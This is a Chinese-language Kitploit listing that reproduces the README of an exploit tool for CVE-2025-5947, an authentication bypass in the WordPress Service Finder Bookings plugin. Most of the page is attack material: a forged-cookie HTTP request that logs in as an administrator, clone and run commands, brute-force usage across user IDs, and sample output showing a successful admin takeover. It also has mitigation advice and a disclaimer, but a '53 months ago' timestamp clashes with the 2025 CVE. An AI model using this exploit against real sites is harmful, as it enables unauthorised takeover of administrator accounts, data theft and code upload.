Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-5947 — CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 漏洞利用 | Kitploit
工具/GitHubGitHub/xxconi/cve-2025-5947
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubxxconi/cve-2025-5947

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 漏洞利用

查看仓库
53个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 漏洞利用工具

CVE-2025-5947 漏洞利用工具 - Service Finder Bookings

License Python Status CVSS

WordPress Service Finder Bookings ≤ 6.0 插件中身份验证绕过漏洞的利用工具

📋 目录

  • 漏洞介绍
  • 技术细节
  • 安装
  • 使用方法
  • 示例
  • 结果
  • 安全
  • 参考资料

🔴 漏洞介绍

CVE-2025-5947

Service Finder Bookings WordPress 插件 6.0 及更早版本中存在一个严重的身份验证绕过漏洞。

🎯 影响

未经过身份验证的攻击者可以:

  • ✅ 以任意用户身份登录
  • ✅ 访问管理员账户
  • ✅ 获得完全的系统控制权
  • ✅ 窃取数据
  • ✅ 上传恶意代码

🔍 技术细节

漏洞成因

service_finder_switch_back() 函数中存在 cookie 验证不足 的问题:

root@kitploit:~
// 不安全的代码
if(isset($_COOKIE['original_user_id'])) {
    $user_id = $_COOKIE['original_user_id'];
    wp_set_current_user($user_id);
    // 没有验证!
}

攻击向量

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1

攻击特征:

  • 🌐 远程利用 (AV:N)
  • 🔓 无需身份验证 (PR:N)
  • 👤 无需用户交互 (UI:N)
  • 📊 完全影响 (C:H, I:H, A:H)

📦 安装

环境要求

  • Python 3.6+
  • requests 库

步骤 1:克隆仓库

root@kitploit:~
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947

步骤 2:安装依赖

root@kitploit:~
pip install -r requirements.txt

步骤 3:运行

root@kitploit:~
python exploit.py -u http://target.com

🚀 使用方法

基本命令

root@kitploit:~
# 显示帮助
python exploit.py -h

# 尝试以管理员 (ID=1) 身份登录
python exploit.py -u http://target.com

# 使用指定用户 ID
python exploit.py -u http://target.com -i 5

# 暴力破解 (ID 1-10)
python exploit.py -u http://target.com -b 1-10

# 不进行 SSL 验证
python exploit.py -u http://target.com --no-ssl-verify

# 使用自定义超时时间
python exploit.py -u http://target.com -t 30

参数说明

💡 示例

示例 1:简单利用

root@kitploit:~
python exploit.py -u http://wordpress.local

输出:

root@kitploit:~
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ 已发现 Service Finder Bookings 插件

🔍 正在尝试以用户 ID 1 登录...
📊 HTTP 状态码: 302
📋 响应头:
   Location: http://wordpress.local/wp-admin/
   Set-Cookie: wordpress_logged_in_abc123=...

✅ 成功!已以管理员身份登录!
📍 重定向: http://wordpress.local/wp-admin/

示例 2:暴力破解

root@kitploit:~
python exploit.py -u http://target.com -b 1-20

输出:

root@kitploit:~
🔄 暴力破解开始 (20 个用户)...
✅ 用户 ID 1: 成功
❌ 用户 ID 2: 失败
✅ 用户 ID 3: 成功
...
✅ 成功用户: [1, 3, 5]

示例 3:HTTPS 且不进行 SSL 验证

root@kitploit:~
python exploit.py -u https://target.com --no-ssl-verify

📊 结果

成功利用包含以下迹象:

✅ HTTP 301 或 302 响应状态码
✅ Location 头中包含 /wp-admin/
✅ Set-Cookie 头中包含 wordpress_logged_in_

🛡️ 安全

⚠️ 法律声明

此工具仅可用于:

  • ✅ 已授权的安全测试
  • ✅ 您自己的系统
  • ✅ 获得书面许可的情况下

请遵守上述要求。作者不承担任何责任。

🔐 防护措施

  1. 立即更新

    root@kitploit:~
    # 从 WordPress 管理面板更新
    # 或使用 WP-CLI
    wp plugin update sf-booking
    
  2. 禁用插件

    root@kitploit:~
    wp plugin deactivate sf-booking
    
  3. 卸载插件

    root@kitploit:~
    wp plugin delete sf-booking
    
  4. Web 应用防火墙 (WAF)

    root@kitploit:~
    Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
    
  5. 安全审计

    • 检查管理员账户
    • 审查访问日志
    • 调查未授权登录行为

📚 参考资料

  • Patchstack 数据库
  • GitHub Advisory
  • NVD 详情
  • 原始漏洞利用代码
  • CVSS 计算器

🤝 贡献

如需报告问题或提出改进建议:

  1. Fork 本仓库
  2. 创建功能分支 (git checkout -b feature/improvement)
  3. 提交更改 (git commit -am 'Add improvement')
  4. 推送分支 (git push origin feature/improvement)
  5. 发起 Pull Request

📄 许可证

MIT License - 详情请查看 LICENSE 文件

👤 作者

安全研究员

  • GitHub: @yourusername

🙏 致谢

  • Patchstack 安全团队
  • WordPress 安全社区
  • CVE 协调机构

⭐ 如果对你有帮助,请点个 Star!

🔝 返回顶部

下载工具
属性值
CVE IDCVE-2025-5947
插件Service Finder Bookings (sf-booking)
受影响版本≤ 6.0
严重性🔴 严重
CVSS 评分9.8
CWECWE-639 (授权绕过)
EPSS 评分0.617 (98.357 百分位)
发布日期2025
参数缩写说明默认值
--url-u目标 URL (必填)-
--user-id-i用户 ID1
--brute-force-b暴力破解范围 (1-10)-
--no-ssl-verify-禁用 SSL 验证False
--timeout-t请求超时时间(秒)10